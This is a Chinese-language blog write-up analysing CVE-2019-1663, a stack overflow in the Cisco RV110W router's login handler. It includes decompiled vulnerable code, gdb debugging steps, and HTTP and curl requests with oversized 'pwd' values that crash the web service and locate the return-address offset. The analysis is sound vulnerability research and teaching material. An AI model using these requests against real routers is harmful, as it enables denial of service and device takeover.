<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s" />
     <link rel="shortcut icon" href= /img/favicon.ico >
    <title>
        Tig3rHu&#39;s Blog
    </title>
    <meta name="description" content= Hello World >
    <meta name="keywords" content= HigerHu,vulnerability,security,cyber >
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.0.0"></head>
<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            Cisco_RV110W_堆栈缓冲区溢出漏洞分析和利用
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h1 id="Cisco-RV110W-堆栈缓冲区溢出漏洞分析"><a href="#Cisco-RV110W-堆栈缓冲区溢出漏洞分析" class="headerlink" title="Cisco_RV110W_堆栈缓冲区溢出漏洞分析"></a>Cisco_RV110W_堆栈缓冲区溢出漏洞分析</h1><h2 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h2><p> 本篇文章是针对Cisco RV110W 设备的一次栈溢出漏洞分析与复现。</p>
<p>漏洞通告：<a target="_blank" rel="noopener" href="https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20190227-rmi-cmd-ex.html">https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20190227-rmi-cmd-ex.html</a></p>
<h2 id="0x02-漏洞触发"><a href="#0x02-漏洞触发" class="headerlink" title="0x02 漏洞触发"></a>0x02 漏洞触发</h2><p>漏洞编号：CVE-2019-1663</p>
<p>漏洞固件版本：Cisco RV110W&lt;1.2.2.1</p>
<p>UART 串口接入设备shell，查看设备的端口开放情况，并且cisco的web服务是可以访问，开启了443端口</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20221115152433365.png" alt="image-20221115152433365"></p>
<p>登录，pwd的值使用MD5 将密码进行加密</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20210726141729042.png" alt="image-20210726141729042"></p>
<p>将payloads 更改为，并且发送请求的payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">POST /login.cgi HTTP/1.1</span><br><span class="line">Host: 192.168.1.1</span><br><span class="line">Connection: close</span><br><span class="line">Content-Length: 556</span><br><span class="line">Cache-Control: max-age=0</span><br><span class="line">sec-ch-ua: &quot;Chromium&quot;;v=&quot;92&quot;, &quot; Not A;Brand&quot;;v=&quot;99&quot;, &quot;Google Chrome&quot;;v=&quot;92&quot;</span><br><span class="line">sec-ch-ua-mobile: ?0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Origin: https://192.168.1.1</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line">Sec-Fetch-Site: same-origin</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Referer: https://192.168.1.1/</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Cookie: XSRF_TOKEN=1222440606; mlap=RGVmYXVsdDM6Ojo6Y2lzY28=</span><br><span class="line"></span><br><span class="line">submit_button=login&amp;submit_type=&amp;gui_action=&amp;wait_time=0&amp;change_action=&amp;enc=1&amp;user=cisco+&amp;pwd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZ&amp;sel_lang=EN</span><br></pre></td></tr></table></figure>

<p>现在我们再次来看设备的web 443服务，可以很明显的看到设备的端口已经down 了。并且设备的web 的服务也无法访问。初步判断在登录的pwd 值处发生了堆栈的缓冲区溢出的漏洞。</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20210726141951659.png" alt="image-20210726141951659"></p>
<h2 id="0x02-固件分析"><a href="#0x02-固件分析" class="headerlink" title="0x02 固件分析"></a>0x02 固件分析</h2><p>由于思科的固件都是公开的，因此可以直接从思科的support站上下载固件，接着使用binwalk 解开固件包，固件使用的是Squashfs 最常见的嵌入式文件系统格式。</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20221115152840681.png" alt="image-20221115152840681"></p>
<p>通过固件内的二进制文件获取获取指令架构的相关信息，固件为mips 32位小端的指令架构。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">shayuhuajiao@ubuntu ~/i/g/_/squashfs-root&gt; file sbin/rc</span><br><span class="line">sbin/rc: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped</span><br><span class="line">shayuhuajiao@ubuntu ~/i/g/_/squashfs-root&gt; file bin/busybox </span><br><span class="line">bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped</span><br></pre></td></tr></table></figure>

<p>根据披露的漏洞信息和漏洞触发行为，漏洞产生在http 服务上，因此可以很快的定位提供http服务的 httpd 二进制文件，该文件在  &#x2F;usr&#x2F;sbin&#x2F;httpd  中</p>
<p>使用ghidra 导入httpd</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20221115155911402.png" alt="image-20221115155911402"></p>
<p><strong>漏洞点的流程</strong></p>
<p>log_in_cgi() –&gt; login_check() —&gt; valid_user()</p>
<p>漏洞函数是在vailid_user(char *pcParm1,char *pcParm2,char *pcParm3,int iParm4)函数，parm1 和 parm2 分别是输入的user 和password 的值，另外parm4 是enc的值。漏洞函数的传参下面会分析，这个函数中具体的漏洞点如下，首先程序会判断enc的值是否是1 ，如果不是，那就对比”enc&#x3D;” 字符串，一般来说都能触发 strcpy 函数。strcpy 函数会将pcParm2 的值复制到acStack109中，并且没有对pcParm2的长度没有限制，因此会造成acStack109[69] 的内存单元无法容纳大长度的字节，从而造成缓冲区溢出的漏洞。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br></pre></td><td class="code"><pre><span class="line">int valid_user(char *pcParm1,char *pcParm2,char *pcParm3,int iParm4)</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  bool bVar1;</span><br><span class="line">  int iVar2;</span><br><span class="line">  size_t sVar3;</span><br><span class="line">  size_t sVar4;</span><br><span class="line">  int iVar5;</span><br><span class="line">  long lVar6;</span><br><span class="line">  undefined4 uVar7;</span><br><span class="line">  char *__s1;</span><br><span class="line">  char *__s1_00;</span><br><span class="line">  undefined4 local_108;</span><br><span class="line">  undefined4 local_104;</span><br><span class="line">  undefined2 local_100;</span><br><span class="line">  char acStack254 [40];</span><br><span class="line">  char acStack214 [40];</span><br><span class="line">  char acStack174 [65];</span><br><span class="line">  char acStack109 [69];</span><br><span class="line">  </span><br><span class="line">  memset(acStack254,0,0x28);</span><br><span class="line">  memset(acStack214,0,0x28);</span><br><span class="line">  memset(acStack174,0,0x41);</span><br><span class="line">  local_108 = 0;</span><br><span class="line">  local_104 = 0;</span><br><span class="line">  local_100 = 0;</span><br><span class="line">  memset(acStack109,0,0x41);  // 初始化acStack109</span><br><span class="line">  sscanf(pcParm3,&quot;%[^,],%[^,],%[^\n]&quot;,&amp;local_108,acStack214,acStack254);</span><br><span class="line">  if (iParm4 == 0) &#123; //iParm4 是enc=的值</span><br><span class="line">    iVar2 = strncmp(acStack214,&quot;enc=&quot;,4);</span><br><span class="line">    if (iVar2 == 0) &#123;</span><br><span class="line">      md5_encode(pcParm2,acStack109);</span><br><span class="line">      sscanf(acStack214,&quot;enc=%s&quot;,acStack174);</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">      strcpy(acStack174,acStack214);</span><br><span class="line">      strcpy(acStack109,pcParm2);//漏洞点获取的pwd参数使用strcpy 到asStack109，没有对长度进行限制，进而产生溢出</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  else &#123;</span><br><span class="line">    iVar2 = strncmp(acStack214,&quot;enc=&quot;,4);</span><br><span class="line">    if (iVar2 == 0) &#123;</span><br><span class="line">      sscanf(acStack214,&quot;enc=%s&quot;,acStack174);</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">      md5_encode(acStack214,acStack174);</span><br><span class="line">    &#125;</span><br><span class="line">    strcpy(acStack109,pcParm2); //漏洞点获取的pwd参数使用strcpy 到asStack109，没有对长度进行限制，进而产生溢出</span><br><span class="line">  &#125;</span><br><span class="line">  sVar3 = strlen(acStack254);</span><br><span class="line">  sVar4 = strlen(pcParm1);</span><br><span class="line">  if (sVar3 == sVar4) &#123;</span><br><span class="line">    sVar3 = strlen(acStack174);</span><br><span class="line">    sVar4 = strlen(acStack109);</span><br><span class="line">    iVar2 = 0;</span><br><span class="line">    if (sVar3 == sVar4) &#123;</span><br><span class="line">      iVar5 = strcmp(acStack254,pcParm1);</span><br><span class="line">      iVar2 = 0;</span><br><span class="line">      if (iVar5 == 0) &#123;</span><br><span class="line">        iVar5 = strcmp(acStack174,acStack109);</span><br><span class="line">        iVar2 = 0;</span><br><span class="line">        if (iVar5 == 0) &#123;</span><br><span class="line">          __s1_00 = (char *)nvram_get(&quot;en_guest&quot;);</span><br><span class="line">          iVar2 = 1;</span><br><span class="line">          if (__s1_00 != (char *)0x0) &#123;</span><br><span class="line">            iVar5 = strcmp(__s1_00,&quot;0&quot;);</span><br><span class="line">            iVar2 = 1;</span><br><span class="line">            if (iVar5 == 0) &#123;</span><br><span class="line">              __s1_00 = (char *)nvram_get(&quot;http_power&quot;);</span><br><span class="line">              iVar2 = 1;</span><br><span class="line">              if (__s1_00 != (char *)0x0) &#123;</span><br><span class="line">                iVar5 = strcmp(__s1_00,&quot;r&quot;);</span><br><span class="line">                iVar2 = 1;</span><br><span class="line">                if (iVar5 == 0) goto LAB_00431a9c;</span><br><span class="line">              &#125;</span><br><span class="line">            &#125;</span><br><span class="line">          &#125;</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  else &#123;</span><br><span class="line">LAB_00431a9c:</span><br><span class="line">    iVar2 = 0;</span><br><span class="line">  &#125;</span><br><span class="line">  if (do_onplus != 0) &#123;</span><br><span class="line">    return iVar2;</span><br><span class="line">  &#125;</span><br><span class="line">  if (iVar2 == 0) &#123;</span><br><span class="line">    iVar2 = nvram_get(&quot;http_client_ip&quot;);</span><br><span class="line">    if (iVar2 == 0) &#123;</span><br><span class="line">      iVar2 = 0x487990;</span><br><span class="line">    &#125;</span><br><span class="line">    syslog(6,&quot;Invalid username or password from %s.&quot;,iVar2);</span><br><span class="line">    return 0;</span><br><span class="line">  &#125;</span><br><span class="line">  iVar2 = sys_uptime();</span><br><span class="line">  __s1_00 = (char *)nvram_get(&quot;auth_time&quot;);</span><br><span class="line">  if (__s1_00 == (char *)0x0) &#123;</span><br><span class="line">    __s1_00 = &quot;&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">  __s1 = (char *)nvram_get(&quot;http_power&quot;);</span><br><span class="line">  if ((__s1 == (char *)0x0) || (iVar5 = strcmp(__s1,&quot;rw&quot;), iVar5 != 0)) &#123;</span><br><span class="line">    iVar5 = 0;</span><br><span class="line">  &#125;</span><br><span class="line">  else &#123;</span><br><span class="line">    __s1 = (char *)nvram_get(&quot;admin_timeout&quot;);</span><br><span class="line">    if (__s1 == (char *)0x0) &#123;</span><br><span class="line">      __s1 = &quot;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    iVar5 = atoi(__s1);</span><br><span class="line">    if (iVar5 == 99) &#123;</span><br><span class="line">      bVar1 = false;</span><br><span class="line">      goto LAB_00431d18;</span><br><span class="line">    &#125;</span><br><span class="line">    iVar5 = iVar5 * 0x3c;</span><br><span class="line">  &#125;</span><br><span class="line">  lVar6 = atol(__s1_00);</span><br><span class="line">  if ((iVar2 &lt; lVar6) || (bVar1 = false, iVar5 &lt;= iVar2 - lVar6)) &#123;</span><br><span class="line">    syslog(6,&quot;Administrator session timeout.&quot;);</span><br><span class="line">    bVar1 = true;</span><br><span class="line">  &#125;</span><br><span class="line">LAB_00431d18:</span><br><span class="line">  __s1_00 = (char *)nvram_get(&quot;auth_st&quot;);</span><br><span class="line">  if ((((__s1_00 == (char *)0x0) || (iVar2 = strcmp(__s1_00,&quot;1&quot;), iVar2 != 0)) ||</span><br><span class="line">      (__s1_00 = (char *)nvram_get(&quot;http_power&quot;), __s1_00 == (char *)0x0)) ||</span><br><span class="line">     ((iVar2 = strcmp(__s1_00,&quot;rw&quot;), iVar2 != 0 || (bVar1)))) &#123;</span><br><span class="line">    nvram_set(&quot;http_power&quot;,&amp;local_108);</span><br><span class="line">    iVar2 = nvram_get(0x485054);</span><br><span class="line">    if (iVar2 == 0) &#123;</span><br><span class="line">      iVar2 = 0x487990;</span><br><span class="line">    &#125;</span><br><span class="line">    set_key_status(iVar2,&amp;DAT_0047f7d4);</span><br><span class="line">    uVar7 = 1;</span><br><span class="line">  &#125;</span><br><span class="line">  else &#123;</span><br><span class="line">    iVar2 = strcmp((char *)&amp;local_108,&quot;rw&quot;);</span><br><span class="line">    if (iVar2 == 0) &#123;</span><br><span class="line">      uVar7 = nvram_get(0x485054);</span><br><span class="line">      nvram_set(&quot;tmp_auth_key&quot;,uVar7);</span><br><span class="line">      uVar7 = 3;</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">      uVar7 = 2;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  return uVar7;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>接着valid_user()函数是如何调用并触发的，根据交叉引用，valid_user 函数在login_check 函数中调用，并且valid_user 的参数也是login_check 函数需要的参数。</p>
<p>int login_check(undefined4 uParm1,undefined4 uParm2,undefined4 uParm3)  : </p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20210727105812234.png" alt="image-20210727105812234"></p>
<p>继续查看login_check 的交叉引用，查看这些参数的传入位置，在log_in_cgi()函数中，此函数会使用get_cgi()分别获取在登录的时候输入的“user”、”pwd”的值。并且把获取到的值作为参数传给login_check()，login_check 函数可以看到调用的时候，传入了三个参数，并且查看到参数分别是user、pwd 的值。ghidra 没有像IDA一样自动显示字符串，我们可以双击 “&amp;DAT_00481470” 查看，也可以设置data为strings。</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20221115161243487.png" alt="image-20221115161243487"></p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20221115161529938.png" alt="image-20221115161529938"></p>
<p>具体的程序漏洞触发流程如下图所示</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211122202746989.png" alt="image-20211122202746989"></p>
<h2 id="0x03-漏洞远程调试-漏洞利用"><a href="#0x03-漏洞远程调试-漏洞利用" class="headerlink" title="0x03 漏洞远程调试&amp;漏洞利用"></a>0x03 漏洞远程调试&amp;漏洞利用</h2><p>通过固件分析，了解了漏洞的产生点，现在开始对漏洞点进行远程调试，上传gdbserver(mips)，并开启设备中的远程调试</p>
<p>设备端：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"># wget http://192.168.1.100:80/gdbserver</span><br><span class="line">Connecting to 192.168.1.101:80 (192.168.1.101:80)</span><br><span class="line">gdbserver            100% |*******************************|  1011k --:--:-- ETA</span><br><span class="line"># chmod 777 ./gdbserver</span><br><span class="line"># ps -w | grep httpd</span><br><span class="line">  348 0          6284 S   httpd </span><br><span class="line">  356 0          6416 S   httpd -S </span><br><span class="line"># ./gdbserver --attach :1234 356</span><br><span class="line">Attached; pid = 356</span><br><span class="line">Listening on port 1234</span><br><span class="line"></span><br><span class="line"># wget http://10.10.10.100:80/gdbserver</span><br><span class="line">Connecting to 10.10.10.100:80 (10.10.10.100:80)</span><br><span class="line">gdbserver            100% |*******************************|  1011k 00:00:00 ETA</span><br><span class="line"># chmod 777 ./gdbserver </span><br><span class="line"># ./gdbserver --attach :1234 348</span><br><span class="line">Attached; pid = 348</span><br><span class="line">Listening on port 1234</span><br></pre></td></tr></table></figure>

<p>调试端：使用gdb 进行远程调试，设置架构集和大小端。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">gdb-multiarch -q httpd</span><br><span class="line">pwndbg&gt; set architecture mips</span><br><span class="line">The target architecture is assumed to be mips</span><br><span class="line">pwndbg&gt; set endian little </span><br><span class="line">The target is assumed to be little endian</span><br><span class="line">pwndbg&gt; target remote 192.168.1.1:1234</span><br><span class="line">Remote debugging using 192.168.1.1:1234</span><br><span class="line">Reading /usr/lib/libnvram.so from remote target...</span><br></pre></td></tr></table></figure>

<h3 id="1）劫持PC"><a href="#1）劫持PC" class="headerlink" title="1）劫持PC"></a>1）劫持PC</h3><p>接下来我们要计算valid_user(）函数中局部变量acStack109到$ra的偏移量</p>
<p>使用pattern.py 来生成随机字符</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20221115161853464.png" alt="image-20221115161853464"></p>
<p>在调试中 在valid_user 函数分配栈空间的指令地址处打断点  break *0x004318BC，然后启动调试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; break *0x004318BC</span><br><span class="line">pwndbg&gt; continue</span><br></pre></td></tr></table></figure>

<p>发送payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -i -k -X POST https://10.10.10.1/login.cgi -d &#x27;submit_button=login&amp;submit_type=&amp;gui_action=&amp;default_login=1&amp;wait_time=0&amp;change_action=&amp;enc=1&amp;user=cisco&amp;pwd=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag&amp;sel_lang=EN&#x27;</span><br></pre></td></tr></table></figure>

<p>程序会断点在valid_user函数的序言处。</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211119143402853.png" alt="image-20211119143402853"></p>
<p>根据valid_user(a1,a2,a3,a4)的定义，并且在login_check函数中调用valid_user函数的汇编可知，上面的调试的断点处，寄存器中的$A0存放user的值，$A1存放pwd的值，$A2存放enc&#x3D;的值。<img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211119144149619.png" alt="image-20211119144149619"></p>
<p>调试到strcpy处，strcpy将pwd的内存地址拷贝到函数的栈空间内。<img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211119151450701.png" alt="image-20211119151450701"></p>
<p>接着往下执行，程序会在strlen 提前中断，调试无法进行下去。<img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211119152320374.png" alt="image-20211119152320374"></p>
<h5 id="中断分析"><a href="#中断分析" class="headerlink" title="中断分析"></a>中断分析</h5><p>函数提前崩溃的原因是strlen()函数的参数$a0的值必须是一个有效的地址，根据汇编代码可知，在覆盖栈上的返回地址之后，会覆盖0x200+arg_0指向的栈空间内容，然后$a0会获取 0x200+arg_0 栈空间地址的内容，然后将其作为参数传递给strlen，因此0x200+arg_0 必须是一个有效的地址，但是我们刚刚传入的值是一个无效的地址，因此为了保证valid_user函数执行时，能够正常执行下去而不被破坏，就需要给strlen传入一个有效的地址。<img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211119161913352.png" alt="image-20211119161913352"></p>
<p>因此为了不破坏strlen函数的栈空间，需要手动计算偏移地址。</p>
<p>根据函数的序言，可以计算出v38 到 var_s24的偏移是105个字节<img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20210729113044396.png" alt="image-20210729113044396"></p>
<p>构造105*‘A’+DDDD+ZZZZ</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -i -k -X POST https://10.10.10.1/login.cgi -d &#x27;submit_button=login&amp;submit_type=&amp;gui_action=&amp;default_login=1&amp;wait_time=0&amp;change_action=&amp;enc=1&amp;user=cisco&amp;pwd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADDDDZZZZ&amp;sel_lang=EN&#x27;</span><br></pre></td></tr></table></figure>

<p>程序依旧会在strlen()函数处中断，并且传入的参数是”ZZZZ”。</p>
